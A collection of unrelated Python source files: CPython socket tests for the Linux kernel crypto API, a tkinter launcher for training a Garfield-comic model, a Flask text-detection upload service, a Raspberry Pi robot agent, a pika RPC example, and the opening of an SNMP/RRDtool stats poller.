self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
    @support.requires_linux_version(4, 9)  # see issue29324
    def test_aead_aes_gcm(self):
        """AES-GCM AEAD through AF_ALG, covering all message-submission
        styles: chunked sends, a single sendmsg_afalg, hand-built ancillary
        data via sendmsg, and a final decrypt-and-verify."""
        key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
        iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
        plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
        assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
        expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
        expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
        taglen = len(expected_tag)
        assoclen = len(assoc)
        with self.create_alg('aead', 'gcm(aes)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            # Tag length must be configured before any operation socket
            # is used.
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
                            None, taglen)
            # send assoc, plain and tag buffer in separate steps
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 assoclen=assoclen, flags=socket.MSG_MORE)
                op.sendall(assoc, socket.MSG_MORE)
                op.sendall(plain)
                # The kernel echoes the associated data, then ciphertext,
                # then the authentication tag.
                res = op.recv(assoclen + len(plain) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])
            # now with msg
            op, _ = algo.accept()
            with op:
                msg = assoc + plain
                op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 assoclen=assoclen)
                res = op.recv(assoclen + len(plain) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])
            # create anc data manually
            pack_uint32 = struct.Struct('I').pack
            op, _ = algo.accept()
            with op:
                msg = assoc + plain
                # Equivalent to sendmsg_afalg, but builds the three
                # SOL_ALG control messages (op, IV, assoclen) by hand.
                op.sendmsg(
                    [msg],
                    ([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
                     [socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
                     [socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
                    )
                )
                res = op.recv(len(msg) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])
            # decrypt and verify
            op, _ = algo.accept()
            with op:
                msg = assoc + expected_ct + expected_tag
                op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
                                 assoclen=assoclen)
                res = op.recv(len(msg) - taglen)
                self.assertEqual(plain, res[assoclen:])
    @support.requires_linux_version(4, 3)  # see test_aes_cbc
    def test_drbg_pr_sha256(self):
        # deterministic random bit generator, prediction resistance, sha256
        with self.create_alg('rng', 'drbg_pr_sha256') as algo:
            # The DRBG is seeded through ALG_SET_KEY.
            extra_seed = os.urandom(32)
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
            op, _ = algo.accept()
            with op:
                # Output is random, so only the length can be asserted.
                rn = op.recv(32)
                self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
    """Detect TCP_* socket constants newly exposed on Windows builds."""

    # Every TCP_* name the socket module is expected to provide on Windows,
    # annotated with the Windows release that introduced it.
    knownTCPFlags = {
        'TCP_MAXSEG',       # available since long time ago
        'TCP_NODELAY',      # available since long time ago
        'TCP_FASTOPEN',     # available starting with Windows 10 1607
        'TCP_KEEPCNT',      # available starting with Windows 10 1703
        'TCP_KEEPIDLE',     # available starting with Windows 10 1709
        'TCP_KEEPINTVL',    # available starting with Windows 10 1709
    }

    def test_new_tcp_flags(self):
        unknown = [name for name in dir(socket)
                   if name.startswith('TCP') and name not in self.knownTCPFlags]
        self.assertEqual([], unknown,
            "New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
    """Run the whole socket test suite in its historical order, with
    threading bookkeeping around the run."""
    tests = [
        GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
        TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
        UDPTimeoutTest,
        NonBlockingTCPTests,
        FileObjectClassTestCase,
        UnbufferedFileObjectClassTestCase,
        LineBufferedFileObjectClassTestCase,
        SmallBufferedFileObjectClassTestCase,
        UnicodeReadFileObjectClassTestCase,
        UnicodeWriteFileObjectClassTestCase,
        UnicodeReadWriteFileObjectClassTestCase,
        NetworkConnectionNoServer,
        NetworkConnectionAttributesTest,
        NetworkConnectionBehaviourTest,
        ContextManagersTest,
        InheritanceTest,
        NonblockConstantTest,
        BasicSocketPairTest,
        TestUnixDomain,
        TestLinuxAbstractNamespace,
        TIPCTest, TIPCThreadableTest,
        BasicCANTest, CANTest,
        BasicRDSTest, RDSTest,
        LinuxKernelCryptoAPI,
        BasicVSOCKTest,
        ThreadedVSOCKSocketStreamTest,
        CmsgMacroTests,
        SendmsgUDPTest,
        RecvmsgUDPTest,
        RecvmsgIntoUDPTest,
        SendmsgUDP6Test,
        RecvmsgUDP6Test,
        RecvmsgRFC3542AncillaryUDP6Test,
        RecvmsgIntoRFC3542AncillaryUDP6Test,
        RecvmsgIntoUDP6Test,
        SendmsgTCPTest,
        RecvmsgTCPTest,
        RecvmsgIntoTCPTest,
        SendmsgSCTPStreamTest,
        RecvmsgSCTPStreamTest,
        RecvmsgIntoSCTPStreamTest,
        SendmsgUnixStreamTest,
        RecvmsgUnixStreamTest,
        RecvmsgIntoUnixStreamTest,
        RecvmsgSCMRightsStreamTest,
        RecvmsgIntoSCMRightsStreamTest,
        # These are slow when setitimer() is not available
        InterruptedRecvTimeoutTest,
        InterruptedSendTimeoutTest,
        TestSocketSharing,
        SendfileUsingSendTest,
        SendfileUsingSendfileTest,
        TestMSWindowsTCPFlags,
    ]
    thread_info = support.threading_setup()
    support.run_unittest(*tests)
    support.threading_cleanup(*thread_info)
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    test_main()
|
interface.py | from tkinter import *
from tkinter import messagebox
from tkinter import ttk
import os
import numpy as np
import threading
cprocess = np.array([False,False,False,False])
processMap = ["Scraping ImSorryJon", "Scraping Garfield Strips", "Loading Scraped Data","Training the Network"]
import queue
def trainModel():
    """Start network training on the datasets ticked in the Train tab.

    Reads the three dataset checkbox IntVars, builds the ``train.py``
    command line and hands it to runCommand() as process slot 3.  Shows an
    error dialog when no dataset is selected.
    """
    tdirs = []
    # IntVar.get() returns 0/1, which is already truthy/falsy — the old
    # bool() wrappers were redundant.
    if sorryVar.get():
        tdirs.append("ImSorryJon")
    if dailyVar.get():
        tdirs.append("DailyGarf")
    if stripVar.get():
        tdirs.append("Strips")
    if tdirs:
        # (A leftover debug print of tdirs was removed here.)
        runCommand("train.py --tdirs " + " ".join(tdirs), 3)
    else:
        messagebox.showinfo("Error", "No datasets selected")
# --- Main window and notebook ------------------------------------------------
root = Tk()
root.title("Algarfieithm Simplified Scripting Homolingual Operating (super)Leveled Executor")
nb = ttk.Notebook(root)
nb.grid()
# Tab 1: scraping controls.
f1 = Frame(nb)
nb.add(f1, text="Scrape")
# Tab 2: training controls (selected by default).
f2 = Frame(nb)
nb.add(f2, text="Train")
nb.select(f2)
nb.enable_traversal()
# Zero-width labels are used purely as vertical spacers.
Label(f1, width = 0, height = 1,).grid(row=0,column=0)
Button(f1,width = 30, text="Scrape all datasets",command=lambda: runCommand("loadScrape.py",2)).grid(row=1,column=0,columnspan=3)
Label(f1, width = 0, height = 1,).grid(row=2,column=0)
Label(f2, width = 0, height = 1,).grid(row=0,column=0)
# Dataset-selection checkboxes; their IntVars are read by trainModel().
dailyVar = IntVar()
Checkbutton(f2, text="Use DailyGarf", variable=dailyVar).grid(row=0, column=0,columnspan=1)
stripVar = IntVar()
Checkbutton(f2, text="Use Garf Strips", variable=stripVar).grid(row=0, column=1,columnspan=1)
sorryVar = IntVar()
Checkbutton(f2, text="Use ImSorryJon", variable=sorryVar).grid(row=0, column=2,columnspan=1)
Button(f2,width = 30, text="Train Network on /r/Imsorryjon",command=trainModel).grid(row=3,column=0,rowspan=2)
Label(f2, width = 0, height = 1,).grid(row=4,column=0)
# Per-tab status labels, refreshed by updateStatus().
status=Label(f1,text="No process started")
status.grid(row=3,column=0)
status2=Label(f2,text="No process started")
status2.grid(row=5,column=0)
def rCArchetpye(command, i):
    """Worker-thread target: run *command* synchronously, then free slot *i*.

    (The name is a historical typo, kept because runCommand() references it.)
    """
    global cprocess
    try:
        # os.system blocks this worker thread until the child process exits.
        os.system(command)
    finally:
        # Bug fix: always release the busy flag, even if launching the
        # command raises, so the UI cannot get stuck on a dead process.
        cprocess[i] = False
def runCommand(fname, i):
    """Launch ``python fname`` in a background thread, occupying slot *i*.

    Slots 0/1 may not run while slot 2 is busy (and vice versa), and a slot
    that is already busy cannot be started again.
    """
    global cprocess
    blocked = (
        (i < 2 and cprocess[2])
        or (i == 2 and np.any(cprocess[:2]))
        or cprocess[i]
    )
    if blocked:
        messagebox.showinfo("Error","This instruction is not compatible with currently running processes. Wait for these to finish.")
        return
    cprocess[i] = True
    worker = threading.Thread(target=rCArchetpye, args=("python " + fname, i))
    worker.start()
def updateStatus():
    """Refresh both status labels from cprocess, then reschedule itself."""
    if np.any(cprocess):
        active = [processMap[idx] for idx, busy in enumerate(cprocess) if busy]
        newStatus = "Processes: " + ", ".join(active)
    else:
        newStatus = "No process started"
    status.configure(text=newStatus)
    status2.configure(text=newStatus)
    # Poll again in half a second.
    root.after(500, updateStatus)
# Kick off the periodic status refresh as soon as the mainloop starts.
root.after(0,updateStatus)
# Hard-exit on window close so background worker threads cannot keep the
# interpreter alive.
root.protocol("WM_DELETE_WINDOW", lambda: os._exit(0))
root.mainloop()
web.py | # coding=utf-8
import sys
import os
import threading
import getopt
import queue
import json
import logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(name)s - %(message)s')
# http 请求模块
import requests
from flask import Flask
from flask import request
sys.path.append(os.getcwd())
from main.ctpn import CTPN
logger = logging.getLogger(__file__)
app = Flask(__name__)
# Work queue feeding image file paths to the CTPN service (bounded so an
# upload flood cannot grow memory without limit).
ctpnWorkerQueue = queue.Queue(1000)
# Images awaiting their result callback, keyed by local file path with the
# callback URL as value.  Bug fix: this used to be initialised with a dead
# placeholder entry {'fileName': 'url'}; it now starts empty.
waitCallbackDict = {}
# File name suffixes accepted for upload.
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
def allowed_file(filename):
    """Return True when *filename* has a suffix listed in ALLOWED_EXTENSIONS."""
    stem, dot, ext = filename.rpartition('.')
    return bool(dot) and ext.lower() in ALLOWED_EXTENSIONS
def ctpnCallback(fileName, ctpnRes):
    """Deliver the CTPN result for *fileName* to its registered callback URL.

    Posts *ctpnRes* as JSON to the URL stored in waitCallbackDict and removes
    the entry only after an HTTP 200 response, so failed callbacks stay
    pending for a later retry.
    """
    # TODO: make the callback asynchronous
    if fileName in waitCallbackDict:
        url = waitCallbackDict.get(fileName)
        try:
            response = requests.post(url = url, data=json.dumps(ctpnRes), headers={'Content-type': 'application/json'})
            if response.status_code == 200:
                logger.info('回调成功')
                waitCallbackDict.pop(fileName)
                return
            logger.warning('回调失败')
        except Exception:
            # Bug fix: logger.exception('回调异常', e) passed the exception
            # as a %-format argument with no placeholder, which broke log
            # formatting.  exception() already appends the traceback.
            logger.exception('回调异常')
@app.route('/', methods=['GET'])
def hello_world():
    """Liveness endpoint confirming the service is up."""
    greeting = 'Hello, CTPN !'
    return greeting
@app.route('/api/ctpn.htm', methods=['GET', 'POST'])
def api_ocr():
    """Accept an image upload for CTPN text detection.

    Request parameters:
        ctpnImg: the image file to recognise
        callbackUrl: URL notified asynchronously with the result
    """
    if request.method == 'GET':
        return 'Hello, CTPN !'
    elif request.method == 'POST':
        if 'ctpnImg' not in request.files:
            return 'No image!'
        file = request.files['ctpnImg']
        if file.filename == '':
            return 'No image!'
        # Robustness fix: a missing callbackUrl used to raise KeyError only
        # *after* the file had been saved; validate it up front instead.
        callback_url = request.form.get('callbackUrl')
        if not callback_url:
            return 'No callbackUrl!'
        if file and allowed_file(file.filename):
            # Security fix: the client-supplied file name is untrusted; strip
            # any directory components so it cannot escape UPLOAD_FOLDER
            # (path traversal via e.g. "../../etc/passwd").
            safe_name = os.path.basename(file.filename)
            imgFilePath = os.path.join(app.config['UPLOAD_FOLDER'], safe_name)
            file.save(imgFilePath)
            # Register for the result callback.
            waitCallbackDict[imgFilePath] = callback_url
            # Hand the image to the CTPN worker queue.
            ctpnWorkerQueue.put(imgFilePath)
            return 'ok'
        return 'Image type error!'
    return 'unknown method!'
def main(host, port, workDir, ctpnDebug):
    """Create work directories, start the CTPN worker thread, run Flask.

    host/port: Flask bind address.  workDir: base directory under which the
    'upload' and 'output' folders are created.  ctpnDebug: passed through to
    CTPN to enable debug image output.
    """
    # Resolve the upload directory to an absolute path and create it.
    uploadDir = os.path.abspath(os.path.join(workDir, 'upload'))
    if not os.path.exists(uploadDir):
        os.makedirs(name = uploadDir, exist_ok = True)
        logger.info('创建上传路径:{}'.format(uploadDir))
    # Resolve the output directory to an absolute path and create it.
    # (Comment fix: the original comment wrongly repeated "upload path".)
    outputDir = os.path.abspath(os.path.join(workDir, 'output'))
    if not os.path.exists(outputDir):
        os.makedirs(name = outputDir, exist_ok = True)
        logger.info('创建输出路径:{}'.format(outputDir))
    # Where uploaded files are stored.
    app.config['UPLOAD_FOLDER'] = uploadDir
    # Upload size limit: 16 MiB.
    app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
    # CTPN service consuming the shared work queue.
    ctpnService = CTPN(workerQueue = ctpnWorkerQueue, callback = ctpnCallback, outputPath = outputDir, debug = ctpnDebug)
    def ctpnServiceRun():
        logger.info("启动 CTPN 服务")
        ctpnService.start()
        # Bug fix: logger.warn() is deprecated; warning() is the real API.
        logger.warning("CTPN 服务退出")
    # CTPN runs on its own thread; app.run() blocks this one.
    ctpnThread = threading.Thread(target=ctpnServiceRun, name='ctpn')
    logger.info("启动 CTPN 服务线程...")
    ctpnThread.start()
    logger.info("启动 CTPN 服务线程成功")
    logger.info("启动 web 服务...")
    app.run(host=host, port=port)
    # Orderly shutdown once Flask exits.
    logger.info("web 服务停止")
    logger.info("终止 CTPN 服务...")
    ctpnService.stop()
    logger.info("等待 CTPN 服务线程退出...")
    ctpnThread.join()
    logger.info("终止 CTPN 服务成功")
def usage():
    """Print the command-line help text to stdout."""
    print("Usage:")
    print(" --host\t\t flask 绑定的 IP 地址,默认:0.0.0.0")
    print(" --port\t\t flask 绑定的端口,默认:20000")
    print(" --workDir\t\t 工作路径")
    print(" --ctpnDebug\t\t ctpn 调试开关。True:生成调试图片供参考")
    # Bug fix: this line said "删除帮助信息" ("delete help info");
    # it should read "显示帮助信息" ("show help info").
    print(" --help\t\t 显示帮助信息")
    print("")
if __name__ == '__main__':
    """
    python main\web.py
    """
    # Long options only; getopt yields (option, value) pairs.
    options, args = getopt.getopt(sys.argv[1:], '', ["help", "host=", "port=", "workDir=", "ctpnDebug="])
    optionDict = {}
    for option in options:
        optionDict[option[0]] = None if len(option) == 1 else option[1]
    if '--help' in optionDict:
        usage()
        sys.exit()
    else:
        # Bug fix: bool("False") is True, so *any* value passed to
        # --ctpnDebug (even "False") used to enable debug mode.  Only the
        # literal string "true" (case-insensitive) enables it now; omitting
        # the option still defaults to False.
        ctpn_debug = str(optionDict.get('--ctpnDebug', '')).lower() == 'true'
        main(host=optionDict.get('--host', '0.0.0.0')
             , port=int(optionDict.get('--port', '20000'))
             , workDir=optionDict.get('--workDir')
             , ctpnDebug=ctpn_debug)
|
agents.py | #!/usr/bin/python
# vim:fileencoding=utf-8
import sys, time, threading
from sensors import Buttons
from actuators import StepMotorPair, Leds, Buzzer
class Agent:
    """State-machine robot controller.

    do_action() runs the main loop on the calling thread while a watcher
    thread (__reset_check) polls the buttons and drives transitions:
    init -> init_ok -> ready -> ready_ok -> run -> run_ok, with "off"
    shutting everything down.  Subclasses provide setup() and loop().
    """
    def __init__(self):
        self.state = "init"  # current state-machine state (shared with watcher thread)
        self.motors = StepMotorPair()
        self.buttons = Buttons()
        self.buzzer = Buzzer()
        self.leds = Leds()
        # NOTE(review): PiCamera is imported further down this module (just
        # before AgentFileListener); the name is resolved at call time.
        self.camera = PiCamera()
        # Button-watcher thread; exits when all buttons request "off".
        threading.Thread(target=self.__reset_check).start()
    def do_action(self):
        """Main loop: run each state's entry action once, then idle (or run
        the subclass loop()) until the watcher thread changes the state."""
        while True:
            if self.state == "init":
                self.__init()
                self.state = "init_ok"
            elif self.state == "ready":
                self.__ready()
                self.state = "ready_ok"
            elif self.state == "run":
                self.leds.change_all(0,0,0,0)
                self.buzzer.off()
                self.state = "run_ok"
            elif self.state == "run_ok":
                # Subclass hook; `continue` skips the 0.1 s sleep so loop()
                # controls its own pacing.
                self.loop()
                continue
            elif self.state == "off":
                self.__init()
                sys.exit(0)
            time.sleep(0.1)
    def __init(self):
        # Entry action for "init": quiesce outputs, then subclass setup().
        self.leds.change_all(1,1,1,0)
        self.buzzer.off()
        self.motors.off()
        self.setup()
    def __ready(self):
        # Entry action for "ready": all LEDs on, buzzer.on(4000)
        # (presumably 4 kHz — confirm with Buzzer), motors powered.
        self.leds.change_all(1,1,1,1)
        self.buzzer.on(4000)
        self.motors.on()
    def __reset_check(self):
        # Watcher thread: all buttons pressed at once -> power off;
        # the front button alone advances the state machine.
        while True:
            self.buttons.update()
            if self.buttons.all_pushed_now():
                self.state = "off"
                return
            elif self.buttons.front_pushed():
                self.__state_transition()
            time.sleep(0.1)
    def __state_transition(self):
        # Advance only from the settled *_ok states, cycling
        # init_ok -> ready, ready_ok -> run, run_ok -> init.
        if self.state == "init_ok": self.state = "ready"
        elif self.state == "ready_ok": self.state = "run"
        elif self.state == "run_ok": self.state = "init"
class AgentHello(Agent):
    """Demo agent: button-driven turns plus a greeting.

    NOTE(review): this class uses Python 2 print-statement syntax and will
    not parse under Python 3.
    """
    def __init__(self):
        Agent.__init__(self)
    def setup(self):
        # Runs during the "init" entry action.
        print >> sys.stderr, "setup"
    def loop(self):
        # Runs repeatedly while in the "run_ok" state.
        self.buttons.update()
        if self.buttons.center_pushed():
            self.motors.turn(90)
        elif self.buttons.back_pushed():
            self.motors.turn(-90)
        print "Hello world"
import os,picamera
from sensors import PiCamera
class AgentFileListener(Agent):
    """Agent driven by one-line commands dropped into a shared-memory file
    (/run/shm/op): left / right / fw / photo."""
    def __init__(self):
        Agent.__init__(self)
        self.opfile = "/run/shm/op"            # command drop file
        self.imagefile = "/var/www/image.jpg"  # where photos are saved
    def setup(self):
        # Best effort: discard any stale command left from a previous run.
        # Bug fix: the bare `except:` also swallowed KeyboardInterrupt and
        # SystemExit; only the expected file errors are ignored now.
        try:
            os.remove(self.opfile)
        except OSError:
            pass
    def loop(self):
        # Read and consume one command; a missing file simply means "no
        # command yet", so back off briefly and try again.
        try:
            with open(self.opfile, "r") as f:
                op = f.readline().rstrip()
            os.remove(self.opfile)
        except (IOError, OSError):
            # (IOError listed separately for Python 2, where it is not an
            # alias of OSError.)
            time.sleep(0.01)
            return
        if op == "left": self.motors.turn(10)
        elif op == "right": self.motors.turn(-10)
        elif op == "fw": self.motors.forward(30)
        elif op == "photo":
            self.camera.capture(self.imagefile)
# Entry point: run the file-driven agent until the buttons request "off".
if __name__ == '__main__':
    agent = AgentFileListener()
    agent.do_action()
|
pika_async_rpc_example.py | """
This is a simple example on how to use Flask and Asynchronous RPC calls.
I kept this simple, but if you want to use this properly you will need
to expand the concept.
Things that are not included in this example.
- Reconnection strategy.
- Closing or re-opening the connection.
  - Keep in mind that any time you want to open or close the connection,
    you should first lock it.
          with self.internal_lock:
self.channel.stop_consuming()
self.connection.close()
- You also need to stop the process loop if you are intentionally
closing the connection.
- Consider implementing utility functionality for checking and getting
responses.
def has_response(correlation_id)
def get_response(correlation_id)
Apache/wsgi configuration.
- Each process you start with apache will create a new connection to
RabbitMQ.
- I would recommend depending on the size of the payload that you have
about 100 threads per process. If the payload is larger, it might be
worth to keep a lower thread count per process.
For questions feel free to email me: me@eandersson.net
"""
__author__ = 'eandersson'
import pika
import uuid
import threading
from time import sleep
from flask import Flask
app = Flask(__name__)
class RpcClient(object):
    """Asynchronous RPC client over a blocking pika connection.

    Publishes requests on *rpc_queue* and collects replies, keyed by
    correlation id, from an exclusive callback queue drained by a background
    daemon thread.
    """

    def __init__(self, rpc_queue):
        """Set up the connection and start the consumer thread.

        1) Set up the pika connection, channel and callback queue.
        2) Start a new daemon thread that processes incoming data events.
        """
        # Bug fix: `queue` and `internal_lock` used to be *class* attributes,
        # so every RpcClient instance shared one response dict and one lock.
        # They are per-instance state now.
        self.internal_lock = threading.Lock()
        self.queue = {}
        self.rpc_queue = rpc_queue
        self.connection = pika.BlockingConnection()
        self.channel = self.connection.channel()
        result = self.channel.queue_declare(exclusive=True)
        self.callback_queue = result.method.queue
        thread = threading.Thread(target=self._process_data_events)
        # Modernisation: Thread.setDaemon() is deprecated in favour of the
        # `daemon` attribute.
        thread.daemon = True
        thread.start()

    def _process_data_events(self):
        """Check for incoming data events.

        Runs on the background thread so the flask instance can issue
        asynchronous requests.  The connection is locked on every poll
        because pika's BlockingConnection is not thread safe.
        """
        self.channel.basic_consume(on_message_callback=self._on_response, auto_ack=False,
                                   queue=self.callback_queue)
        while True:
            with self.internal_lock:
                self.connection.process_data_events()
            sleep(0.1)

    def _on_response(self, ch, method, props, body):
        """Store the reply body under its correlation id."""
        self.queue[props.correlation_id] = body

    def send_request(self, payload):
        """Send an asynchronous RPC request and return its correlation id.

        Unlike the rpc example on rabbitmq.com we do not wait for the
        response here; the caller polls ``self.queue[corr_id]``::

            corr_id = rpc_client.send_request(payload)
            while rpc_client.queue[corr_id] is None:
                sleep(0.1)
            return rpc_client.queue[corr_id]

        In a web application it is usually best to implement a timeout so
        the client won't be stuck waiting indefinitely.
        """
        corr_id = str(uuid.uuid4())
        self.queue[corr_id] = None
        with self.internal_lock:
            self.channel.basic_publish(exchange='',
                                       routing_key=self.rpc_queue,
                                       properties=pika.BasicProperties(
                                           reply_to=self.callback_queue,
                                           correlation_id=corr_id,
                                       ),
                                       body=payload)
        return corr_id
@app.route('/rpc_call/<payload>')
def rpc_call(payload):
    """Flask endpoint that issues an RPC request and blocks until the
    matching response arrives (no timeout — see the module docstring)."""
    corr_id = rpc_client.send_request(payload)
    response = rpc_client.queue[corr_id]
    while response is None:
        sleep(0.1)
        response = rpc_client.queue[corr_id]
    return response
# Create the module-level client used by the route above, then serve.
if __name__ == '__main__':
    rpc_client = RpcClient('rpc_queue')
    app.run()
|
stats_poller.py | import os
import re
import sys
import time
import yaml
import socket
import logging
import urllib2
import rrdtool
import argparse
import multiprocessing as mp
from scalrpy.util import rpc
from scalrpy.util import helper
from scalrpy.util import dbmanager
from scalrpy.util import cryptotool
from scalrpy.util import basedaemon
from sqlalchemy import and_
from sqlalchemy import exc as db_exc
from multiprocessing import pool
from scalrpy import __version__
# Net-SNMP OIDs (UCD-SNMP-MIB / IF-MIB) for each metric group polled over
# SNMP, keyed by metric-group name then metric name.
oids_data = {
    'cpu':{
        'user':'.1.3.6.1.4.1.2021.11.50.0',
        'nice':'.1.3.6.1.4.1.2021.11.51.0',
        'system':'.1.3.6.1.4.1.2021.11.52.0',
        'idle':'.1.3.6.1.4.1.2021.11.53.0',
        },
    'la':{
        'la1':'.1.3.6.1.4.1.2021.10.1.3.1',
        'la5':'.1.3.6.1.4.1.2021.10.1.3.2',
        'la15':'.1.3.6.1.4.1.2021.10.1.3.3',
        },
    'mem':{
        'swap':'.1.3.6.1.4.1.2021.4.3.0',
        'swapavail':'.1.3.6.1.4.1.2021.4.4.0',
        'total':'.1.3.6.1.4.1.2021.4.5.0',
        'avail':'.1.3.6.1.4.1.2021.4.6.0',
        'free':'.1.3.6.1.4.1.2021.4.11.0',
        'shared':'.1.3.6.1.4.1.2021.4.13.0',
        'buffer':'.1.3.6.1.4.1.2021.4.14.0',
        'cached':'.1.3.6.1.4.1.2021.4.15.0',
        },
    'net':{
        'in':'.1.3.6.1.2.1.2.2.1.10.2',
        'out':'.1.3.6.1.2.1.2.2.1.16.2',
        }
    }
# RRDtool data-source (DS) and archive (RRA) definitions for each metric
# group.  All archives keep AVERAGE/MAX/LAST consolidations at 1-, 6-, 24-
# and 288-step resolutions, 800 rows each.
cpu_source = [
    'DS:user:COUNTER:600:U:U',
    'DS:system:COUNTER:600:U:U',
    'DS:nice:COUNTER:600:U:U',
    'DS:idle:COUNTER:600:U:U'
]
cpu_archive = [
    'RRA:AVERAGE:0.5:1:800',
    'RRA:AVERAGE:0.5:6:800',
    'RRA:AVERAGE:0.5:24:800',
    'RRA:AVERAGE:0.5:288:800',
    'RRA:MAX:0.5:1:800',
    'RRA:MAX:0.5:6:800',
    'RRA:MAX:0.5:24:800',
    'RRA:MAX:0.5:288:800',
    'RRA:LAST:0.5:1:800',
    'RRA:LAST:0.5:6:800',
    'RRA:LAST:0.5:24:800',
    'RRA:LAST:0.5:288:800']
la_source = [
    'DS:la1:GAUGE:600:U:U',
    'DS:la5:GAUGE:600:U:U',
    'DS:la15:GAUGE:600:U:U'
]
la_archive = [
    'RRA:AVERAGE:0.5:1:800',
    'RRA:AVERAGE:0.5:6:800',
    'RRA:AVERAGE:0.5:24:800',
    'RRA:AVERAGE:0.5:288:800',
    'RRA:MAX:0.5:1:800',
    'RRA:MAX:0.5:6:800',
    'RRA:MAX:0.5:24:800',
    'RRA:MAX:0.5:288:800',
    'RRA:LAST:0.5:1:800',
    'RRA:LAST:0.5:6:800',
    'RRA:LAST:0.5:24:800',
    'RRA:LAST:0.5:288:800'
]
mem_source = [
    'DS:swap:GAUGE:600:U:U',
    'DS:swapavail:GAUGE:600:U:U',
    'DS:total:GAUGE:600:U:U',
    'DS:avail:GAUGE:600:U:U',
    'DS:free:GAUGE:600:U:U',
    'DS:shared:GAUGE:600:U:U',
    'DS:buffer:GAUGE:600:U:U',
    'DS:cached:GAUGE:600:U:U'
]
mem_archive = [
    'RRA:AVERAGE:0.5:1:800',
    'RRA:AVERAGE:0.5:6:800',
    'RRA:AVERAGE:0.5:24:800',
    'RRA:AVERAGE:0.5:288:800',
    'RRA:MAX:0.5:1:800',
    'RRA:MAX:0.5:6:800',
    'RRA:MAX:0.5:24:800',
    'RRA:MAX:0.5:288:800',
    'RRA:LAST:0.5:1:800',
    'RRA:LAST:0.5:6:800',
    'RRA:LAST:0.5:24:800',
    'RRA:LAST:0.5:288:800'
]
# Network counters carry an upper bound (20 GiB) to reject wrap-around spikes.
net_source = [
    'DS:in:COUNTER:600:U:21474836480',
    'DS:out:COUNTER:600:U:21474836480'
]
net_archive = [
    'RRA:AVERAGE:0.5:1:800',
    'RRA:AVERAGE:0.5:6:800',
    'RRA:AVERAGE:0.5:24:800',
    'RRA:AVERAGE:0.5:288:800',
    'RRA:MAX:0.5:1:800',
    'RRA:MAX:0.5:6:800',
    'RRA:MAX:0.5:24:800',
    'RRA:MAX:0.5:288:800',
    'RRA:LAST:0.5:1:800',
    'RRA:LAST:0.5:6:800',
    'RRA:LAST:0.5:24:800',
    'RRA:LAST:0.5:288:800'
]
# Count of running servers per role/farm.
servers_num_source = [
    'DS:s_running:GAUGE:600:U:U'
]
servers_num_archive = [
    'RRA:AVERAGE:0.5:1:800',
    'RRA:AVERAGE:0.5:6:800',
    'RRA:AVERAGE:0.5:24:800',
    'RRA:AVERAGE:0.5:288:800',
    'RRA:MAX:0.5:1:800',
    'RRA:MAX:0.5:6:800',
    'RRA:MAX:0.5:24:800',
    'RRA:MAX:0.5:288:800',
    'RRA:LAST:0.5:1:800',
    'RRA:LAST:0.5:6:800',
    'RRA:LAST:0.5:24:800',
    'RRA:LAST:0.5:288:800'
]
io_source = [
    'DS:read:COUNTER:600:U:U',
    'DS:write:COUNTER:600:U:U',
    'DS:rbyte:COUNTER:600:U:U',
    'DS:wbyte:COUNTER:600:U:U'
]
io_archive = [
    'RRA:AVERAGE:0.5:1:800',
